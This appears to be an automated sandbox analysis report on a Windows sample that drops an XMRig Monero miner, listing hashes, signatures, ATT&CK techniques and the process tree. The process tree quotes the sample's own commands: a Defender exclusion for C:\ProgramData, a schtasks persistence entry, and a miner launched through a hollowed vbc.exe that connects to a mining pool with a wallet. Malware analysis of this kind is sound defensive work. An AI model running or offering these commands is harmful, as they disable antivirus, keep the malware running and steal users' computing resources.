xmrig | cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

General

Target

file.exe
Size

1.4MB
MD5

fb21c01c3d8d6b321034d48518c3d2a0
SHA1

372e822ce100a56d5066fce4574b9b0833daf27c
SHA256

cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b
SHA512

81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf
SSDEEP

24576:MiCj1Tnwpevq7BZlrkY/wP91wSRXZZAvnn3h:MR1Twpevq7HJkY4nwSRXIPn

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/936-185-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/936-186-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/936-187-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/936-188-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/936-190-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/936-192-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

OWT.exe

pid process

1052 OWT.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

OWT.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation OWT.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

OWT.exe

description pid process target process

PID 1052 set thread context of 936 1052 OWT.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3184 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1488 timeout.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exeOWT.exe

pid process

4392 powershell.exe
4392 powershell.exe
428 powershell.exe
428 powershell.exe
1052 OWT.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

668

pid	process
1052	OWT.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	OWT.exe

description	pid	process	target process
PID 1052 set thread context of 936	1052	OWT.exe	vbc.exe

pid	process
3184	schtasks.exe

pid	process
1488	timeout.exe

pid	process
4392	powershell.exe
4392	powershell.exe
428	powershell.exe
428	powershell.exe
1052	OWT.exe

pid	process
668

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

file.exepowershell.exeOWT.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	2856	file.exe
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeDebugPrivilege	1052	OWT.exe
Token: SeDebugPrivilege	428	powershell.exe
Token: SeLockMemoryPrivilege	936	vbc.exe
Token: SeLockMemoryPrivilege	936	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

936 vbc.exe

pid	process
936	vbc.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

file.execmd.exeOWT.execmd.exe

description	pid	process	target process
PID 2856 wrote to memory of 4392	2856	file.exe	powershell.exe
PID 2856 wrote to memory of 4392	2856	file.exe	powershell.exe
PID 2856 wrote to memory of 5040	2856	file.exe	cmd.exe
PID 2856 wrote to memory of 5040	2856	file.exe	cmd.exe
PID 5040 wrote to memory of 1488	5040	cmd.exe	timeout.exe
PID 5040 wrote to memory of 1488	5040	cmd.exe	timeout.exe
PID 5040 wrote to memory of 1052	5040	cmd.exe	OWT.exe
PID 5040 wrote to memory of 1052	5040	cmd.exe	OWT.exe
PID 1052 wrote to memory of 428	1052	OWT.exe	powershell.exe
PID 1052 wrote to memory of 428	1052	OWT.exe	powershell.exe
PID 1052 wrote to memory of 2352	1052	OWT.exe	cmd.exe
PID 1052 wrote to memory of 2352	1052	OWT.exe	cmd.exe
PID 2352 wrote to memory of 3184	2352	cmd.exe	schtasks.exe
PID 2352 wrote to memory of 3184	2352	cmd.exe	schtasks.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe
PID 1052 wrote to memory of 936	1052	OWT.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEA36.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:1488

C:\ProgramData\winrar\OWT.exe
"C:\ProgramData\winrar\OWT.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2352

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
5⤵
- Creates scheduled task(s)
PID:3184

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\winrar\OWT.exe
Filesize
1.4MB

MD5
fb21c01c3d8d6b321034d48518c3d2a0

SHA1
372e822ce100a56d5066fce4574b9b0833daf27c

SHA256
cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

SHA512
81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf

Download Submit
C:\ProgramData\winrar\OWT.exe
Filesize
1.4MB

MD5
fb21c01c3d8d6b321034d48518c3d2a0

SHA1
372e822ce100a56d5066fce4574b9b0833daf27c

SHA256
cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

SHA512
81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
20ec454fbb832c95da962152fb0b21ad

SHA1
1a41746ac6baf52c081bfa1329fb856c1f45bf8d

SHA256
a7b5a5bcec4eb629d2a777dcab0216802a4cc57d49702b63afe93d2ffc3aff3d

SHA512
059891cdd6609f7adcd3a243eaef8a1663cdeb73aa49483ac448bb47fb6d8647382ca1451bc8c8ba99f2b443aa926ac3d55401f64ace884fc2b886d9f3b8526e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
733763e8525de81c79a8b5357a22a67c

SHA1
e0bad5ea6ffb8a87dba15f099b0b082eb4532d83

SHA256
6d812e25db8a3d7334f8c7092e49f89761a2b6146df84060c6eacbed011ff72e

SHA512
1efa73c8e20bd0c9767636636ae08451198f788de8949b0d529eebaafed0376803cd349ed3de573cf47f7a7d01b7b3c30c0a2047defcb6b03db0b48917893116

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpEA36.tmp.bat
Filesize
138B

MD5
e8e007c30d0ad05d7b9956230e060671

SHA1
095ddcbbf5cc722d82633401168c9b3c3fba837e

SHA256
0cbd625fdc2141ba97d2ab8843ee4d543bf1bba2df12f7749575fc70162c2cda

SHA512
f1a79ff58fa1acee28ebff6a68e646e181098100f10a174111872a9b62064f6b5571ded08936d3a17c1e0fb5bf0c8d390091d5863bd1abb622c326898b5a614e

Download Submit
memory/428-170-0x0000000000000000-mapping.dmp

Download
memory/428-176-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/936-189-0x00000225271A0000-0x00000225271C0000-memory.dmp

Filesize
128KB

Download
memory/936-190-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/936-188-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/936-187-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/936-186-0x0000000140343234-mapping.dmp

Download
memory/936-185-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/936-191-0x00000225271E0000-0x0000022527220000-memory.dmp

Filesize
256KB

Download
memory/936-192-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/936-193-0x0000022527240000-0x0000022527260000-memory.dmp

Filesize
128KB

Download
memory/936-194-0x0000022527220000-0x0000022527240000-memory.dmp

Filesize
128KB

Download
memory/936-195-0x0000022527240000-0x0000022527260000-memory.dmp

Filesize
128KB

Download
memory/936-196-0x0000022527220000-0x0000022527240000-memory.dmp

Filesize
128KB

Download
memory/1052-179-0x00007FFC9BBA0000-0x00007FFC9BCA2000-memory.dmp

Filesize
1.0MB

Download
memory/1052-184-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/1052-183-0x0000000000B10000-0x0000000000CD8000-memory.dmp

Filesize
1.8MB

Download
memory/1052-154-0x0000000000000000-mapping.dmp

Download
memory/1052-182-0x0000000000D30000-0x0000000000D71000-memory.dmp

Filesize
260KB

Download
memory/1052-158-0x00007FFC9C290000-0x00007FFC9C33A000-memory.dmp

Filesize
680KB

Download
memory/1052-159-0x00007FFCB8900000-0x00007FFCB899E000-memory.dmp

Filesize
632KB

Download
memory/1052-160-0x00007FFCB4A70000-0x00007FFCB4A82000-memory.dmp

Filesize
72KB

Download
memory/1052-161-0x00007FFC9C140000-0x00007FFC9C1FD000-memory.dmp

Filesize
756KB

Download
memory/1052-162-0x00007FFCB7F20000-0x00007FFCB80C1000-memory.dmp

Filesize
1.6MB

Download
memory/1052-164-0x0000000000B10000-0x0000000000CD8000-memory.dmp

Filesize
1.8MB

Download
memory/1052-163-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/1052-165-0x0000000000D30000-0x0000000000D71000-memory.dmp

Filesize
260KB

Download
memory/1052-166-0x00007FFCB8F70000-0x00007FFCB8F9B000-memory.dmp

Filesize
172KB

Download
memory/1052-168-0x0000000000B10000-0x0000000000CD8000-memory.dmp

Filesize
1.8MB

Download
memory/1052-167-0x0000000000B10000-0x0000000000CD8000-memory.dmp

Filesize
1.8MB

Download
memory/1052-169-0x00007FFC9BFF0000-0x00007FFC9C13E000-memory.dmp

Filesize
1.3MB

Download
memory/1052-181-0x00007FFCB5F20000-0x00007FFCB5F5B000-memory.dmp

Filesize
236KB

Download
memory/1052-171-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/1052-180-0x00007FFCB80D0000-0x00007FFCB813B000-memory.dmp

Filesize
428KB

Download
memory/1052-178-0x00007FFCAA420000-0x00007FFCAA455000-memory.dmp

Filesize
212KB

Download
memory/1052-177-0x00007FFCB7220000-0x00007FFCB7247000-memory.dmp

Filesize
156KB

Download
memory/1488-151-0x0000000000000000-mapping.dmp

Download
memory/2352-173-0x0000000000000000-mapping.dmp

Download
memory/2856-134-0x00007FFCB8900000-0x00007FFCB899E000-memory.dmp

Filesize
632KB

Download
memory/2856-135-0x00007FFCB4A70000-0x00007FFCB4A82000-memory.dmp

Filesize
72KB

Download
memory/2856-133-0x00007FFC9C290000-0x00007FFC9C33A000-memory.dmp

Filesize
680KB

Download
memory/2856-140-0x00000000032E0000-0x0000000003321000-memory.dmp

Filesize
260KB

Download
memory/2856-148-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/2856-146-0x0000000000F00000-0x00000000010C8000-memory.dmp

Filesize
1.8MB

Download
memory/2856-139-0x0000000000F00000-0x00000000010C8000-memory.dmp

Filesize
1.8MB

Download
memory/2856-147-0x00000000032E0000-0x0000000003321000-memory.dmp

Filesize
260KB

Download
memory/2856-136-0x00007FFC9C140000-0x00007FFC9C1FD000-memory.dmp

Filesize
756KB

Download
memory/2856-137-0x00007FFCB7F20000-0x00007FFCB80C1000-memory.dmp

Filesize
1.6MB

Download
memory/2856-143-0x00007FFC9BFF0000-0x00007FFC9C13E000-memory.dmp

Filesize
1.3MB

Download
memory/2856-142-0x0000000000F00000-0x00000000010C8000-memory.dmp

Filesize
1.8MB

Download
memory/2856-141-0x00007FFCB8F70000-0x00007FFCB8F9B000-memory.dmp

Filesize
172KB

Download
memory/2856-138-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/3184-175-0x0000000000000000-mapping.dmp

Download
memory/4392-149-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/4392-144-0x0000000000000000-mapping.dmp

Download
memory/4392-153-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/4392-152-0x000002146E790000-0x000002146E7B2000-memory.dmp

Filesize
136KB

Download
memory/5040-145-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads